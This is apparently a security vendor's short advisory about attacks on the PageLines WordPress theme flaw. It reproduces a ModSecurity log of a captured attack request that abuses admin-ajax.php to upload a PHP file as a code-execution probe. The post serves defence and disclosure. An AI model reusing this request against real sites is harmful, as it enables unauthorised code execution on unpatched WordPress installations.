Last few days we have seen very much attacks this old Pagelines WordPress theme vulnerability. Sucuri discovered Pagelines vulnerability on January 2015.
Technical Details
Any website using vulnerable version of the platform theme (<1.4.4) is risk Privilege Escalation and Remote Code Execution.
ModSecurity Audit log, Payload
[27/May/2017:02:32:09 +0300] WSi6@VQikyQAAErqcawAAAAg 93.170.77.90 37930 127.0.0.1 80 --5367c063-B-- POST /wp-admin/admin-ajax.php HTTP/1.1 User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Connection: close, Te Accept: */* Te: trailers Accept-language: en-US;q=0.8,en;q=0.6 Accept-encoding: gzip, deflate Content-length: 398 Host: vsdysleksia.net Content-type: multipart/form-data; boundary=xYzZY Referer: https://malware.expert/
Here POST data:
--5367c063-C-- --xYzZY Content-Disposition: form-data; name="page" pagelines --xYzZY Content-Disposition: form-data; name="file"; filename="settings.php" Content-Type: text/plain < ?php echo '0ba4439ee9a46d9d9f14c60f88f45f87'; exit; ?> --xYzZY Content-Disposition: form-data; name="action" pagelines_test_ajax --xYzZY Content-Disposition: form-data; name="settings_upload" settings --xYzZY--
Final words
Websites that using Malware Expert – ModSecurity rules are protected against this vulnerability.